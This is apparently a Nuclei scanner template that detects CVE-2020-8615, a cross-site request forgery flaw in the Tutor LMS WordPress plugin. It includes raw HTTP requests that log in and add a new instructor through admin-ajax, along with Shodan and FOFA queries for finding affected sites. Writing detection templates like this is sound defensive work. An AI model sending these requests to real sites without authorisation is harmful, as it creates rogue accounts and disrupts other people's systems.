id: CVE-2020-8615

info:
  name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
  author: r3Y3r53
  severity: medium
  description: |
    A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
  impact: |
    Attackers can exploit CSRF to approve themselves as instructors or block legitimate instructors, potentially disrupting the learning management system.
  remediation: update to v.1.5.3
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8615
    - https://wpscan.com/vulnerability/10058
    - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
    - https://wpvulndb.com/vulnerabilities/10058
    - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-8615
    cwe-id: CWE-352
    epss-score: 0.0867
    epss-percentile: 0.92608
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/tutor/
    fofa-query: body=/wp-content/plugins/tutor/
    publicwww-query: /wp-content/plugins/tutor/
  tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum,vuln
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100c53f2c3ed9788981caa7495922f7233239a83d2dc797beaeec6e005ce13ff14a022100c257e142a52d7f38965d759954cc0a98d9d066ac381037ff1b8006fa4e472bc4:922c64590222798bb761d5b6d8e72950